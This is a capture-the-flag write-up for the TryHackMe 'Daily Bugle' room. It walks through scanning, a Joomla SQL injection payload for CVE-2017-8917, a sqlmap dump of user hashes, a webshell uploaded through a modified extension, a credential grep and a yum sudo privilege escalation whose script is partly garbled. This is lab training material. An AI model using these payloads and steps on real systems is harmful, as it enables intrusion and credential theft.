THM - Daily Bugle CTF Writeup
Read on Medium (System Weakness) →Link to the room: https://tryhackme.com/room/dailybugle
Initial Scans
whatweb:
http://10.10.141.227/ [200 OK] Apache[2.4.6], Bootstrap,
Cookies[eaa83fe8b963ab08ce9ab7d4a798de05], Country[RESERVED][ZZ], HTML5,
HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.6.40],
HttpOnly[eaa83fe8b963ab08ce9ab7d4a798de05], IP[10.10.141.227], JQuery,
MetaGenerator[Joomla! - Open Source Content Management], PHP[5.6.40],
PasswordField[password],
Script[application/json], Title[Home], X-Powered-By[PHP/5.6.40]
---
Nmap:
Nmap scan report for 10.10.141.227
Host is up (1.5s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysqlThe Webpage
The landing page consists of a mock news media site, with a login panel prompting username and password on the right side.
- We know that this CTF will contain SQLi, so this may be our entry point
- We know from both the CTF as well as the whatweb scan that the site is using the Joomla CMS
SQLi Exploitation
The first step I took after making my initial scans was to look up known Joomla SQLi vulnerabilities. I don't [yet] know the Joomla version, but CVE-2017-8917 pops up immediately on google and the exploitDB page even gives a sqlmap example command!
The vulnerable parameters/URL is:
http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27Specifically, the "com_fields" parameter is injectable.
Error-based payload:
option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)b)c)After entering the payload, I did indeed receive an error:
500 Duplicate entry 'qqvpq1qjpvq1' for key 'group_key'After experimenting with the requests for a bit longer, I decided to go to sqlmap and used the -r switch with a text file containing a request from burp with the vulnerable parameters:
sqlmap -r request.txt --users --passwords --tables --random-agentThis returned a user entry and hash:
Database: joomla
Table: #__users
[1 entry]
+-----+------------+--------------------------------------------------------------+----------+
| id | name | password | username |
+-----+------------+--------------------------------------------------------------+----------+
| 811 | Super User | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm | jonah |
+-----+------------+--------------------------------------------------------------+----------+The hash is encrypted with blowfish/bcrypt. After running hashcat, the password was cracked.
Foothold
We now are authenticated on the website as user jonah -- "Super User." The next step is to transition to get a foothold on the actual machine.
Since we have what appears to be admin rights, it may be possible to upload a webshell via the administrator panel. I downloaded a random poll extension, replaced the install script with a webshell, zipped it, uploaded, and got my shell.
I upgraded the shell with:
python -c 'import pty; pty.spawn("/bin/bash")'After searching through the system, I found credentials in the configuration.php file:
cat * | grep passwordThe password worked for user jjameson, and I obtained the user flag.
Privilege Escalation
Now that a password has been obtained, it is possible to check for sudo command access:
sudo -l
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yumWith sudo access to yum, we can use the privesc method from GTFOBins to escalate to root:
TF=$(mktemp -d)
cat >$TF/x<$TF/y.conf<$TF/y.py< This method creates a custom plugin that spawns a shell. After successfully executing this exploit and escalating privileges to root, we can obtain the root flag!